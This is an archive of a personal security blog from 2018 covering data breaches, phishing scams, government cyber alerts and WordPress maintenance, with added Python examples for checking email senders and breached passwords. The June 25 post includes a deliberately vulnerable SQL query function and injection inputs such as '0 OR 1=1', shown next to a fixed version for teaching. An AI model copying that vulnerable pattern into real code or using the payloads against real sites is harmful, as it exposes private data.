Tuesday, December 04, 2018

Quora has large data breach, but it is unlikely to harm many users

Quora, a site where users pose questions that other users answer, has reported a breach affecting about 100 million users, caused by unauthorized access to one of its systems by a malicious third party, which it says it discovered on Friday, Nov. 30.

Motherboard (Vice) reports in a story here by Joseph Cox.

CEO Adam D’Angelo, 34, has written an official statement here.

The stolen passwords were hashed (Quora’s statement describes them as “encrypted (hashed)”), not stored in plaintext, which makes them harder to misuse, especially in a batch this large, since each one would have to be cracked first.  Users who had reused the same password on other accounts should still change it there, because a cracked or guessed password is immediately usable anywhere it was reused.

But the stolen email addresses may make phishing spam more frequent (and I’m wondering if that somehow accounts for the Apple-themed spam I got last week).

When I went back to the site this morning, it invited me to sign in with Facebook (which is probably also not the best choice for security now, given what happened this year).

Most users are not likely to have placed other PII or non-public material on this site.

The site keeps track of subject-matter preferences.  I see a lot of questions about USCF chess ratings.
CERT has just reported several industrial espionage trojans, which I’ll have to get back to later.

Sunday, December 02, 2018

I install a legitimate iPhone app, and get a suspicious email

On Thursday, I installed the SmartNews app on my iPhone.  It is true that I had to look around for the right Apple password, as I had not used it for a while.

I later got this bizarre email (shown) from a spammer saying my account was “signed on with another device”.  That may be OK, but not the sender address of “account.mail.verify.complite”.  What’s going on?

In the past I’ve gotten bogus Apple emails claiming credit card transactions in Indonesia and Belarus for materials I never bought.  And no credit card transactions ever appeared.

Thursday, November 15, 2018

Foreign espionage hackers use publicly available tools; Russians could retaliate for de-platforming of their fake news sites; phishing for election recounts

US-CERT has published Alert AA18-284A, a joint report by the cybersecurity authorities of the United States, the United Kingdom, Canada, Australia and New Zealand, about “publicly available hacking tools” seen in cyber incidents worldwide.

Most of the tools presented (a remote access trojan, a web shell, a credential stealer, a lateral-movement framework and a command-and-control obfuscator) are built for covert, persistent access to a network, the kind of foothold used for corporate espionage.
But concern persists that China, North Korea, and Russia can continue to do destructive attacks on relatively innocuous American interests, “to prove we can”.

There were some sporadic backbone router outages early Monday, Nov. 12, which might have been malicious.  Since US social media companies and perhaps hosts have no-platformed what they believe to be Russian fake accounts and “fake news” bots, the Russians might attack legitimate smaller interests in the US (or, more likely, the infrastructure supporting them) just to prove they can, as retaliation.

One other thing: there seems to be some phishing spam going around claiming to raise money for Florida recounts.

Thursday, November 01, 2018

Could spammers send out no-platforming phishing notices? Also -- soft "NSA" intelligence tips when your email or social media shows unusual content repeatedly

Just a quick security tip.

If you get unusual volumes of emails, texts, robocalls, twitter mentions, Facebook postings in your timeline (or page if you allow multiple admins – a dubious idea now) or even US mail letters – about causes to which you have no connection and have no interest in supporting – just be careful, and watch your back.

It can mean someone views you as a threat to them.  Perhaps you’re lowballing them in business, or they think you are.

This goes a little beyond depending on spam filters or being careful about emails purporting to be from parties you know but looking odd. 

This is a matter that intelligence services and CIA and NSA people know well.
It’s even conceivable that spammers will send out sham “no-platforming” takedown emails (purporting to come from social media platforms, domain registrars or hosts, claiming some sort of terms-of-service violation).  The first thing to verify is the actual sender address, not just the display name, and the real target of any link (a mouseover shows where a link really goes).  But the From header itself can be forged, so also look at the Authentication-Results header your mail provider adds: if DKIM did not pass for the platform’s real domain, or the links point somewhere else, treat the notice as fake and check your account status by logging in directly rather than through the email.
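As an added example (not code from the original post), here is a small Python check, using only the standard library, of the things the paragraph says to verify: the real From address behind the display name, the envelope sender, the SPF/DKIM results in the Authentication-Results header, and where the links actually point.  The two messages, their domains, their headers and the list of “expected” Apple domains are constructed for the demonstration and are not real mail.

```python
import email
import re
from email.utils import parseaddr

# Both messages are constructed for this example: the addresses, domains,
# links and Authentication-Results contents are invented and describe no
# real mail. The first mimics the "signed on with another device" notice
# discussed in the post; the second is what a genuine notice might look like.
SUSPICIOUS_RAW = """\
Return-Path: <bounce@mailer.example.net>
Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=mailer.example.net; dkim=none
From: "Apple" <account.mail.verify.complite@mailer.example.net>
To: victim@example.org
Subject: Your Apple ID was signed in on another device

Your account was signed on with another device.
Verify now: http://apple-id-verify.example.com/login
"""

LEGIT_RAW = """\
Return-Path: <bounce@email.apple.com>
Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=email.apple.com; dkim=pass header.d=email.apple.com
From: "Apple" <no_reply@email.apple.com>
To: victim@example.org
Subject: Your Apple ID was used to sign in

Manage your account at https://appleid.apple.com/
"""

# Assumption for the example: the domains the real platform sends from and
# links to. In practice take this list from the platform's own documentation.
EXPECTED_DOMAINS = {"apple.com", "email.apple.com", "appleid.apple.com"}


def _domain(addr):
    """Domain part of an address, lower-cased ('' if there is none)."""
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def _auth_result(auth_header, method):
    """Pull 'spf=pass' / 'dkim=none' style results out of Authentication-Results."""
    m = re.search(r"\b%s=(\w+)" % method, auth_header)
    return m.group(1).lower() if m else "missing"


def _link_hosts(body):
    """Hostnames of every http(s) link in the body (what a mouseover would show)."""
    return {h.lower() for h in re.findall(r"https?://([^/\s]+)", body)}


def _in_expected(host, expected):
    return any(host == d or host.endswith("." + d) for d in expected)


def analyze_sender(raw, expected_domains=EXPECTED_DOMAINS):
    """Return the facts a reader should check before trusting a notice."""
    msg = email.message_from_string(raw)
    display_name, from_addr = parseaddr(msg.get("From", ""))
    _, return_path = parseaddr(msg.get("Return-Path", ""))
    auth = msg.get("Authentication-Results", "")
    body = msg.get_payload() if not msg.is_multipart() else ""

    warnings = []
    from_dom = _domain(from_addr)
    rp_dom = _domain(return_path)
    spf = _auth_result(auth, "spf")
    dkim = _auth_result(auth, "dkim")
    bad_links = sorted(h for h in _link_hosts(body)
                       if not _in_expected(h, expected_domains))

    # The display name is free text; only the address domain means anything.
    if not _in_expected(from_dom, expected_domains):
        warnings.append("display name %r but From domain %r is not an expected domain"
                        % (display_name, from_dom))
    # An envelope sender (Return-Path) domain that differs from the From domain
    # is a classic sign of a mass mailer or a spoof.
    if rp_dom and rp_dom != from_dom:
        warnings.append("envelope sender domain %r differs from From domain %r"
                        % (rp_dom, from_dom))
    # SPF only vouches for the envelope domain (which may be the spammer's own);
    # DKIM is what ties the From header to a signing domain.
    if dkim != "pass":
        warnings.append("DKIM did not pass (%s); the From header is unverified" % dkim)
    if spf != "pass":
        warnings.append("SPF did not pass (%s)" % spf)
    if bad_links:
        warnings.append("links point to non-platform hosts: %s" % ", ".join(bad_links))

    return {
        "display_name": display_name,
        "from_address": from_addr,
        "from_domain": from_dom,
        "return_path_domain": rp_dom,
        "spf": spf,
        "dkim": dkim,
        "link_hosts": sorted(_link_hosts(body)),
        "warnings": warnings,
        "suspicious": bool(warnings),
    }


if __name__ == "__main__":
    for name, raw in (("suspicious", SUSPICIOUS_RAW), ("legitimate", LEGIT_RAW)):
        result = analyze_sender(raw)
        print(name, "->", "SUSPICIOUS" if result["suspicious"] else "looks consistent")
        for w in result["warnings"]:
            print("   ", w)
```

Note that the constructed spam message passes SPF: the spammer controls mailer.example.net and can publish an SPF record for it, so a passing SPF says nothing about whether the mail is from Apple.  What matters is whether DKIM passed for a domain the platform actually uses, and whether the links go there.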

Thursday, October 18, 2018

EFF advises on what to do if your Facebook account was hacked

Gennie Gebhart has a piece on the Electronic Frontier Foundation site about what to do if you were caught in the Facebook hack.

There seem to be about 14 million people who had significant personal information taken.  They are at risk of very targeted phishing, and possibly of break-ins to their financial accounts (although I think Facebook denied that credit card info was taken).  A graver risk, however unlikely in practice, would be impersonation of someone in committing a crime, framing that person.

Wednesday, October 10, 2018

DHS, US-CERT document multiple foreign threats, not just to elections

US DHS Secretary Kirstjen Nielsen told the Senate today that the US faces unprecedented cyber threats from overseas adversaries: governments, corporations and even individuals.  The best link is ABC’s here.  The midterm elections aren’t the only catalyst.

US-CERT reports (TA18-276B) “Advanced Persistent Threat Activity Exploiting Managed Service Providers” (link).  It’s not clear whether this includes web hosting companies.  (See also TA18-276A, on credential control, which is related.)
There is also a new HIDDEN COBRA alert on the North Korean “FASTCash” ATM cash-out campaign, TA18-275A, link.

Monday, October 08, 2018

Google-Plus shutting down ("sunsetting") after company finds potential security vulnerabilities very difficult to fix in a cost-effective way for individuals; enterprise version will be boosted

Google has suddenly announced today that it will “sunset” Google+ for individual consumers, while promoting a new version for enterprises.  I heard about this on FB Messenger from a Friend in the DC area LGBT and social media business community.

The decision is announced here on Google’s own blog.  The consumer version will be wound down, with a migration period for user data, by the end of August 2019.  The discussion is part of a “Project Strobe” review of third-party API access.

But the sudden announcement came after a major security lapse was reported.  Ashley Carman has a story on The Verge here.
The Wall Street Journal has more details in a searing story today by Douglas MacMillan and Robert McMillan, here.  Apparently there was a consumer data leak (a bug in a Google+ API that exposed profile data to third-party apps) that the WSJ, at least, says was not properly communicated to the public.  Google says the problem was found during Project Strobe and that it found no evidence the data was misused.
Google reports low consumer usage and engagement, apparently in comparison with major rivals (Facebook).  Google announced Google+ in 2011 and intended it to pursue the “circles” concept of grouping contacts even further than Facebook, but it never took off.
I have found Google+ useful in stimulating discussion on YouTube videos I like, particularly on classical music.  I have not used it a lot in other areas for communicating news.
This development raises potential questions in my own mind about the long-range future of Blogger, this platform, also owned by Google but completely separate from Google+ (though available through the same Google account).  I don’t know how well the business model for Blogger works today compared to a decade ago; but I have wondered about that since around 2015, as I have noticed that not that many people advertise on the blogs (that I happen to look at), despite claims to the contrary on product forums.  But I don’t see that Blogger could present any of the same security problems.

There have not been that many high-profile shutdowns of consumer platforms.  AOL shut down its Hometown product in 2008 for low usage and provided a transition to Blogger.  Myspace seems to be running OK.
This is a developing story that will be covered in more detail on posts on other blogs, as there are strategic implications especially for individual users (compared to whole companies and enterprises)

Sunday, October 07, 2018

Another Facebook "friend request" hoax

Here’s the low-down on the new Facebook “friend request” scam that erupted today.

I got one of these messages in church, during the communion.

ABC Action News (Tampa Bay) explains the hoax here.
This seems to be an invitation that lets the scammer create duplicate profiles (that happened to me in 2016).

Thursday, October 04, 2018

News2Share covers indictment of seven Russian hackers

News2Share journalist Ford Fischer gives a good account of the indictment of seven Russian military intelligence (GRU) officers, tied to “Fancy Bear”, in this long Twitter thread of the DOJ press conference today.

Vox Sentences summarizes “The Vanishing of Jamal Khashoggi” and, in the same edition, the indictment, which concerned hacking tied to the exposure of doping by Russian athletes.

But the Military Times (Gregory Katz et al.) notes that the indictment also says the Russians targeted a nuclear power company in Pennsylvania, possibly hoping to jump across an air gap to a control system.

Tuesday, October 02, 2018

Is Trump's idea of pre-emptive cyber attack making us all less safe?

Josephine Wolff offers an op-ed in the New York Times particularly critical of Trump’s interest in pre-emptive cyber attacks, “Trump’s Reckless Cyber-Security Strategy.” 
Actually, this is not so far from criticizing the wisdom of the proposed “bloody nose” strike on North Korea (including, in some versions, an electromagnetic pulse (EMP) attack) in late February after the Winter Olympics, which was argued down.

Wolff says the Obama administration was careful about unleashing Stuxnet on Iran.  But the danger today might be in tempting foreign powers to try jumping the “air gaps” that separate US power-grid control networks from the open Internet.
Wolff also discusses the Sony hack in 2014, but that may have had more to do with a company antagonizing a particular foreign enemy, North Korea.

Friday, September 28, 2018

Facebook admits to major security breach in "view as" feature, affects 50 million accounts

Facebook now reports a major security breach, disclosed here, which it says it discovered on September 25, involving the “View As” feature: a bug in it let attackers steal access tokens that could be used to take over accounts.

Yahoo! reports the incident in a news story here.  About 50 million user accounts were affected.  40 million more were forced to sign back in as a precaution.

Users who sign into other apps with their Facebook login could find those compromised too, since the stolen tokens worked there as well.
Mine has not been, although I probably should reset the password soon.

Update: Oct. 3

Mike Isaac and Kate Conger of the New York Times say that the Facebook hack has placed many user accounts at secondary sites at risk.  The problem is that many subscription or donor-supported sites allow sign-in through Facebook, and a stolen access token could be used for that login as well.  It’s possible that credit card or PayPal info could be stolen, but there is no evidence yet that this has actually happened.

CNN has a speculative article noting that it took Facebook eleven days from Sept. 16, when it first saw unusual activity, to close the hole.  It is unclear how much damage could really have been done.

Thursday, September 27, 2018

Facebook hacks cause spam messages to be sent from friends' accounts (followup)

Following up on the Sept. 20 post, I got a bizarre, terse message on Facebook tonight, simply “Is it you?”.  The message contained a music video that would not play.

The Facebook friend said he had been hacked and these spam messages did not come from him.

Earlier, I got a video from a friend in France, “I dedicate this to you”, of a legitimate popular French song.
ZDNet and Daily Post have stories on Facebook hacks that may explain this.

Thursday, September 20, 2018

Facebook messenger warns of hackers posting offensive content under the name of friends' accounts

I got a Facebook message early this morning from a “friend” in France warning of the possibility of hackers sending out offensive content under someone else’s account.  I don’t know yet how valid this risk really is.
“How sad, what happens on Facebook! We may end up leaving Facebook. .. In addition to porn videos, there is a new hacker on Facebook that posts offensive sentences as comments on your contacts’ publications as if they were from you. It’s really ugly and it looks like it came from your profile. You do not see it, but your friends do. This can create offenses and misunderstandings. I want to say to all my contacts that if anything offensive happens, know that it does not come from me.
“I ask you especially to kindly warn me.”
This message appeared overnight in French on my phone, with emoji.

Monday, September 10, 2018

Hoax virus rumor about Donald Trump's health; "young people will win" finds impostors trying to sell things with fake accounts

I’ve gotten messages on Facebook warning of emails with attachments purporting to be pictures of Trump collapsing from a stroke.
Fact-checking site Snopes says this is a hoax.

However, it should be obvious that you shouldn’t open an attachment from an email of uncertain source purporting to contain a politically provocative image (like “Baby Trump”) or document.

The “plaid shirt guy”, Tyler Linfesty, advises everyone that his identity has been spoofed by people trying to sell things.  If you get an email or see a post from anyone in the “young people will win” crowd trying to sell products, it’s a fake account.

Tuesday, September 04, 2018

"Playpen" case shows government can use malware to set up a sting

The Electronic Frontier Foundation has recently drawn attention to malware (what the government calls a “network investigative technique”, or NIT) deployed by the FBI that exploited a vulnerability in the Firefox-based Tor Browser to make a visitor’s computer reveal identifying information, such as its real IP address, that Tor is supposed to hide.

The malware was delivered from a child pornography site called Playpen, a Tor hidden service that the FBI seized and then ran itself for about two weeks, and it resulted in searches of users’ home computers, possibly in violation of the Fourth Amendment.  EFF’s page on the Playpen case, with discussion of the malware, is here.
What sounds scary is that a foreign enemy could use the same kind of exploit to possibly frame individuals for c.p. access.

Wednesday, August 22, 2018

DNS propagation failure makes US-owned sites accessible only in China, where they were banned, for about an hour; possible proof-of-concept hack?

There was a problem yesterday with a major hosting service where DNS A-record propagation failed for a while.  The end result, if you looked at whatsmydns.net, was that the sites resolved from non-democratic countries (particularly China) and some of eastern Europe, but not from the West.

The problem was intermittent and was fixed in about two hours.  But it struck me that something like this could happen because of a deliberate foreign hack.  While sites, even individually owned ones, were not reachable from the U.S. or some western countries, it sounds conceivable that hackers could have altered them in a proof-of-concept attack.  I’m not aware that this really happened, but the pattern is suspicious.
Many of these US-owned and -based sites are supposedly banned in China.  It’s odd that only Beijing could reach them for about an hour.  A more mundane explanation is that resolvers in different countries cache records for different lengths of time (the record’s TTL), so a propagation failure can easily look geographically selective even when nothing was targeted.

Tuesday, August 21, 2018

Russian hackers create fake websites mimicking conservative think tanks and politicians ("Fancy Bear")

Microsoft has uncovered more Russian (“Fancy Bear”) meddling before the 2018 midterms, activity which could pose a threat to ordinary users at least through spear phishing.  Here is the Yahoo! report.

Apparently Russian interests set up fake websites mimicking a few conservative think tanks and even groups associated with some mainstream Republican US senators not particularly cooperative with Trump.  Visitors might have encountered malware or credential-phishing pages, or received phishing emails pointing to these fake sites.
Security companies like Trend Micro and Webroot will be able to flag these sites as suspicious quickly, of course, but Microsoft (which runs its own Windows Defender and in this case obtained a court order to seize the domains) caught the problem first.

A couple other ideas come to mind.  Should telecoms, given the relaxing of net neutrality, refuse to let these sites be connected?

Another risk could be that in the future foreign hackers set up sites purporting to belong to individuals (even someone like me), perhaps those with a conservative bias.  This could create serious problems for those individuals, but we’ll look at that soon on the identity theft blog.

Elizabeth Dwoskin and Craig Timberg have a detailed story in the Washington Post. 

Friday, August 17, 2018

Reports about hijacking of Instagram accounts and associated emails by Russians are surfacing; blockchain is proposed as a solution

I have received an inquiry for an interview with an Internet security expert who reports a problem with Instagram accounts being hijacked.  When targets try to recover their accounts through the recovery email, they find the contact email has also been replaced with a Russian email address.

The account content is often replaced with Disney and Pixar character images.

The contact is proposing the use of blockchain to make social media accounts more secure.  But blockchain would then have to become a much more important apparatus than 2-step verification.

I suggested that the press agent have the company provide me with more details (like a URL) before I try to do a phone interview.
I will note a couple of anomalies.  I haven’t used Instagram much.  But when I set it up a few years ago I found that there was already a dummy unused account there.  This sounds dangerous.  What if someone stole your identity and used a social media service you hadn’t joined (say Snapchat) for criminal purposes?  This could be a way for a foreign enemy to wreak havoc, by targeting random Americans to be framed by prosecutors.  So the email I got points indirectly to another potential future hazard that so far is little known, although there were occasional mentions of it (in conjunction with ransomware) as far back as 2013.

Monday, August 06, 2018

Wall Street Journal reports administration scurrying now over cyber threats to power grids, which could involve home or small business users as honeypots

In early July, I happened to log on to my Dominion Power account to try to pay a bill, and got a bizarre error from the website.  The next day it worked, but maybe that’s a preview of the substance of this Wall Street Journal article by Rebecca Smith, “U.S. Steps Up Grid Defense: To fight cyberattacks on critical utilities, officials push for stronger penalties.”  Online, the article is quite high profile (though behind a subscription paywall) and illustrated.

The main threat seems to be that foreign hackers (Russia, China, Iran, North Korea, possibly radical Islamist groups) get access through suppliers or small utilities, whose staff then carry software across “air gaps” on thumb drives.  Despite the air gap from the public Internet, the security environment for major electric utilities and for the grid operators (for the three major interconnections) is very complicated and could be breached.  Small utilities and suppliers don’t have the advanced security to protect themselves from state hackers.

Another threat is corporate and even home routers, which seem to be a set of “mouseholes” in which malware can hide.

The article suggests that malware (from groups such as Dragonfly, also called Energetic Bear) could be hiding in utility control systems, called SCADA (which, to be emphasized, aren’t directly accessible from your computer or phone).  There are reports that this malware has lived on some utilities’ systems since 2012.

The article suggests that spear-phishing, watering-hole attacks on trade websites, or air-gap crossing are the main methods.

The article even goes so far as to suggest that the government is concerned about mass internal migrations should a protracted regional power failure occur (the August 2003 failure in the Northeast lasted about a day).

Do ordinary users at home add to the risk?  Possibly, through home routers.  Rebooting a router (turning it off and on) clears malware that lives only in memory, but on most consumer routers firmware updates must be applied manually through the administration page unless the ISP manages the device, so a reboot by itself is not an update.  Another possibility, mentioned shortly after 9/11 and then forgotten, was steganography, where instructions for terror attacks or malware are hidden in innocuous content on amateur sites.  Another would be to plant criminal material like child pornography on sites to try to frame ordinary civilians, as an intimidation tactic by foreign enemies.  So far the closest thing that has happened has been occasional defacing of a few websites (like random restaurants) or the Sony hack.  (There had been scattered reports, as far back as 2013, of ransomware that threatened to load c.p. onto a user’s computer; at one time possession would have been a strict liability offense.)  A few politically oriented sites (in the eyes of the beholder) may have been targeted.  Recently (in May and June) a major WordPress blog set up to advise asylum seekers, which admittedly had used an old insecure theme, was hacked, but it was finally secured properly and is back up.  (Fortunately it had good backups; backup technology would be worth another big blog post.)

Ted Koppel wrote a book called “Lights Out” about all of this (reviewed on Books, Nov. 15, 2015).

This article doesn’t even consider EMP and solar storms, which I’ve discussed elsewhere.
As someone who dealt with the draft a half century ago, foreign enemies pose novel moral dilemmas for how individuals can be expected to behave.

Wednesday, July 25, 2018

Phishing scam presents a stolen password in the subject line, demands payment over a claimed webcam video of the victim watching porn

Business Insider, in a story by Kif Leswing, reports on a vicious new scam where the victim gets a phishing email with one of his real passwords in the subject line.  The email then tries to blackmail the person, claiming to have webcam video of him watching porn, and demands payment in bitcoin.

In actual fact, the password has almost certainly come from an older breach dump traded on the dark web, probably from one of the many major corporate hacks.  The attacker does not actually have a video; the password is included only to make the threat look credible.  If that password is still in use anywhere, change it there.

But of course you can cover the camera on your computer.

Monday, July 23, 2018

US-CERT warns on Emotet Malware, major hazard for financial institutions

US-CERT has sent out an alert on “Emotet Malware”, bulletin TA18-201A.  Emotet is a modular banking trojan that also acts as a downloader for other malware, and it has gone after bank and securities accounts.

It is mainly aimed at financial targets (including payment spheres and PayPal) and is usually spread through phishing emails with malicious attachments or links.  But it could apparently steal from consumer accounts as well, since it harvests banking credentials from the machines it infects.

Consumers should, as always, watch balances online and pay attention to whether automated payments and the like process properly.
But this report appears to apply most directly to employees of financial institutions and to corporate network administrators.

Sunday, July 15, 2018

Site allows you to check if your email passwords have been stolen

“Pardon the interruption, your passwords are leaking.”  It’s a kind of incontinence.
So Geoffrey Fowler writes in the Washington Post Business section, “Stolen Password?  Here’s What to Do About It.”

He gives a site, “Have I Been Pwned”, here.

One of my emails was found on seven sites that had been breached, but not on any dark web sites themselves.
Fowler recommends changing every password every 90 days, turning on 2-step authentication, and using really long, unique passwords stored in a password manager.  (Current NIST guidance, SP 800-63B, no longer recommends routine expiry without evidence of compromise; length and uniqueness matter more, and a breach check like the one above is the right trigger for a change.)
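The check Fowler points to can be done without sending your password anywhere: the Pwned Passwords API takes only the first five hex characters of the password’s SHA-1 hash and returns every hash suffix in that range, so the comparison happens on your own machine (k-anonymity).  As an added example, not from the Post article or from Have I Been Pwned, the Python below implements that client-side check.  The range reply is a constructed stand-in for the live service (only the suffix for the string “password” is a real SHA-1 value; the counts and other suffixes are invented), and fetch_range_live is the function that would contact the real endpoint.

```python
import hashlib
import urllib.request

# Real endpoint of the Pwned Passwords range API (only fetch_range_live uses it).
RANGE_URL = "https://api.pwnedpasswords.com/range/"


def sha1_parts(password):
    """Split the upper-case SHA-1 hex digest into the 5-character prefix that is
    sent to the service and the 35-character suffix that never leaves the machine."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def parse_range(response_text):
    """Parse the 'SUFFIX:COUNT' lines of a range reply into {suffix: count}.
    Padded replies contain extra suffixes with count 0; they are kept harmlessly."""
    counts = {}
    for line in response_text.splitlines():
        suffix, sep, count = line.strip().partition(":")
        if not sep:
            continue
        counts[suffix.strip().upper()] = int(count.strip() or 0)
    return counts


def breach_count(password, fetch_range):
    """Number of times the password appears in breach data, via k-anonymity:
    fetch_range receives only the hash prefix and returns the raw reply text."""
    prefix, suffix = sha1_parts(password)
    return parse_range(fetch_range(prefix)).get(suffix, 0)


def fetch_range_live(prefix):
    """Contact the real service (needs network; not used by the offline demo).
    Add-Padding asks for dummy entries so the reply size does not leak the range."""
    req = urllib.request.Request(
        RANGE_URL + prefix,
        headers={"Add-Padding": "true", "User-Agent": "hibp-range-example"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


# Constructed stand-in for the service so the demo runs offline. The suffix
# 1E4C9B93... is the real SHA-1 suffix of the string "password"; the counts and
# the other suffixes are made up and are not data from Have I Been Pwned.
FAKE_RANGES = {
    "5BAA6": "\n".join([
        "003D68EB55068C33ACE09247EE4C639306B:3",
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3730471",
        "1E8E3C6B4C2A3C6F9C0A9E2B8D9C9D7A7A1:0",  # padding-style entry
    ]),
}


def fake_fetch_range(prefix):
    return FAKE_RANGES.get(prefix, "")


def check_password_offline(password):
    """breach_count against the constructed ranges above."""
    return breach_count(password, fake_fetch_range)


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple"):
        prefix, _ = sha1_parts(pw)
        n = check_password_offline(pw)
        print("%-30s prefix sent: %s  seen in breaches: %d" % (pw, prefix, n))
```

To run it against the real service, call breach_count(password, fetch_range_live); the only thing that leaves the machine is the five-character prefix, which matches roughly one in a million hashes.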

Tuesday, July 10, 2018

"dbsync" file with 0 bytes loaded by some adware on some sites

A recent Salon article stalled when I was scrolling in Google Chrome on Windows 10.  When I viewed it in Firefox, it scrolled fine, but Firefox asked me if I wanted to download a file called “dbsync” with zero bytes.  I declined.

Afterwards I restarted and ran a full scan in Trend Micro, and it came up clean.  The file seems like a pivot for adware, which is probably not malicious but would be removed as “bloatware” by some security products.
On Google searches, Trend warns of some fraudulent anti-virus products that claim they will remove dbsync.

Thursday, July 05, 2018

US Cert would do well to publish more on SQL Injection issues

I wanted to take a moment and gather some material from US-CERT on SQL injection attacks.

The main primer dates back to 2012, and the link is here.  Note that US-CERT reports a large number of attacks in 2008 against sites running Microsoft IIS.  The recommendations in the paper relate mainly to larger organizations and suggest that theft of user PII is the biggest danger.

In 2016 US-CERT warned that SQL injection attacks might be attempted by foreign adversaries against voter registration databases, here.

NICCS lists tuition-based classes for companies on preventing SQL injection.  Usually these mean employers send technical staff to cities (like Seattle) for several days of travel.

The scale of the training required makes security a difficult matter for individual bloggers to handle on their own.  WordPress and Automattic need to remain aggressive in fixing vulnerabilities as they are found (in core, but especially in plugins and themes, where most injection bugs turn up), and bloggers should install the latest versions promptly when offered.  This is more true now than it was a few years ago because of the tense political climate, domestically and worldwide.
Blogger has never attracted attention for vulnerabilities like this, because it is a hosted platform whose database is Google’s own and is never exposed to the blogger.

Wednesday, June 27, 2018

WordPress password change on hosted sites needs a little SQL knowledge

If you blog on WordPress on a hosted platform, the procedure for resetting a user password through the database is more complicated than on a free blog.  It’s a good idea to do this at unpredictable intervals.
Generally, you go into phpMyAdmin, look for the database that corresponds to the blog (if you have more than one, the name is in the blog’s wp-config.php, which you can read in the File Manager), open its tables, look for the users table (wp_users by default), edit the user_pass field with the new password, and choose the MD5 function from the dropdown so that what gets stored is a hash.  BlueHost is pretty typical.
What is stored is a hash of the password, not the password you enter on the WordPress login screen.  WordPress’s own hashing scheme is stronger than plain MD5; a plain MD5 hash written directly into wp_users is accepted at the next login and then silently replaced with the stronger hash, which is why a reset done this way should be followed by logging in.
I don’t get why in this video you need to regenerate it on WordPress itself, but I’ll look into it.

Monday, June 25, 2018

Primers on WordPress and SQL injection vulnerabilities

There are reports of code found on WordPress sites containing SQL statements with “1=1” conditions (always true), the classic signature of a SQL injection attempt, in which input is pasted into a query so that it changes the query’s logic instead of being treated as data.

Here’s a typical story

The statement may occur in a theme, or in the wp-includes directory.

It is unclear how they got there (an already-compromised site, a malicious theme, or a vulnerable plugin are the usual routes).
Here is a primer on how SQL injection attacks work.
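As an added illustration (not from the linked story or primer), here is what a “1=1” injection does and why it works, in Python with an in-memory SQLite table that stands in for a WordPress posts table; the table, its rows and the inputs are constructed for the example.  The vulnerable function splices the request parameter into the SQL text; the hardened one binds it as a parameter and rejects anything that is not an integer.

```python
import sqlite3

# Constructed stand-in for a WordPress posts table: a public post, an
# unpublished draft and a private note that must never be served to visitors.
SAMPLE_ROWS = [
    (1, "Welcome", "publish"),
    (2, "Unreleased announcement", "draft"),
    (3, "Site credentials (private note)", "private"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, post_status TEXT)"
    )
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_sql(post_id):
    """Builds the statement by string formatting: whatever the visitor sends
    becomes part of the SQL text, so it can rewrite the WHERE clause.
    With post_id = "0 OR 1=1" the status filter is bypassed because AND binds
    tighter than OR: (status = 'publish' AND id = 0) OR 1=1 is true for every row."""
    return "SELECT id, title FROM posts WHERE post_status = 'publish' AND id = %s" % post_id


def fetch_post_vulnerable(conn, post_id):
    return conn.execute(vulnerable_sql(post_id)).fetchall()


def fetch_post_safe(conn, post_id):
    """Hardened version: the value is coerced to an integer first and then
    bound as a parameter, so the database only ever sees it as data."""
    try:
        pid = int(post_id)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT id, title FROM posts WHERE post_status = 'publish' AND id = ?",
        (pid,),
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    for payload in ("1", "0 OR 1=1", "0 OR id = 3"):
        print("input %r" % payload)
        print("   vulnerable SQL: ", vulnerable_sql(payload))
        print("   vulnerable rows:", fetch_post_vulnerable(conn, payload))
        print("   safe rows:      ", fetch_post_safe(conn, payload))
```

The same pattern applies in PHP with $wpdb: the fix WordPress itself uses is $wpdb->prepare() with placeholders, never string concatenation of request parameters into the query.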

Friday, June 15, 2018

Apple fixes lingering security flaw in iPhone that enables law enforcement investigations on locked phones

My own iPhone updated to iOS 11.4 a little while ago.

Apple has announced a security fix to prevent hackers from getting into a locked phone through its Lightning port, which would also block the tools law enforcement has used to get into one.  The New York Times story by Jack Nicas is here.
Tim Cook has said that building a way for anyone but the owner into a locked phone would be the software equivalent of “cancer”.

Thursday, June 14, 2018

Security companies need more transparency in how they report customer site risk, even to hosting providers

There has been some controversy (since mid 2017) over how security companies like SiteLock mark websites as “high risk” with apparently no transparency as to what the risk factors are.
This is also an issue because security companies usually work with hosting providers who do the billing and who might have some concerns over their own downstream liability for customers (as this climate has been changing rapidly, as with FOSTA, for example). 
Forbes had a piece in August 2017 by Kalev Leetaru, and White Fir Design has several articles from 2017, for example this one.
There are reports of hosting providers threatening to cut off customers who experience one malware hacking attack.  There are also reports of telemarketing calls selling site security services, which would dilute the credibility of the services if the calls weren’t legitimate.
It is not clear whether site risk is based on the technical components (use of specific Wordpress plugins, for example) or its content (whether it is controversial according to the “skin in the game” theory, which has percolated for years while getting very little media attention). 
One concern is that with network neutrality gone, telecoms could (with public pre-notice first) block sites rated as risky, either by anti-virus companies that they acquire through mergers, or even through content-delivery security services like SiteLock, Cloudflare, and the like.  We already know that Cloudflare has terminated the accounts of some objectionable publishers (so far limited to white supremacist sites).
This is an evolving issue that may change with time and generate new incidents and controversies.

Friday, June 08, 2018

Should you change all your default privacy settings now?

Here is Geoffrey A. Fowler’s moral lecture “Hands off my data: 15 default privacy settings you should change right now”, in the Washington Post.  A Facebook friend shared this piece early Friday, and said he accepted that he has no privacy online.
Facebook is the worst offender, but even Microsoft and Apple have their sins.
For most of us, this sounds like paranoia.  But it really depends on how exposed you are to meddling by others, in your personal living situation and employment.
It also depends on whether you are in a circumstance where people connected to you can be affected – especially if your online reputation matters in the workplace because you sell somebody else’s ideas.
We all depend on surveillance capitalism.

Wednesday, June 06, 2018

Trend Micro loops updating a Windows 10 computer with the Creators Update, after returning from vacation non-use

On one Windows 10 computer, which I did not use for 11 days while on the road, Trend Micro update keeps looping.

